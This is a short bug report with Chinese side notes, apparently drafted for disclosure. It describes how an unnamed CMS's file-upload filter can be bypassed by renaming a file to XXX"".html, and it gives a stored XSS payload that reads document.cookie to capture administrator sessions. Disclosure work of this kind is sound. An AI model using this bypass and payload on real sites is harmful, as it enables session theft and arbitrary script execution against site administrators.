0x01
给老外写的时候用的英文(谷歌翻译的)
I installed the latest version of ***(这个东西比较敏感) CMS and found upload bypass in the system
In the latest version(3.0.4), the system forbids HTML suffix name upload, but now it can bypass it.
0x02
Vulnerability proof
You can bypass the file upload limit by putting double quotes before the suffix of HTML
1 Visit website http://[address]:[port]/[app_path]/admin/index.php?id=filesmanager with login
2 Save html codes with '.png’extensions. and upload it like below.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>hacker</title>
</head>
<body>
<svg/onload=alert(document.cookie)>
</body>
</html>
Click the uploaded file and Grab the packet and change the suffix name to XXX"".html at filename,This circumvents this limitation.
4 move to http://[address]:[port]/[app_path]/public/uploads/[uploaded file]
You can see that you executed HTML and JS code,If you access this file, you can get the administrator’s cookie and execute any JS code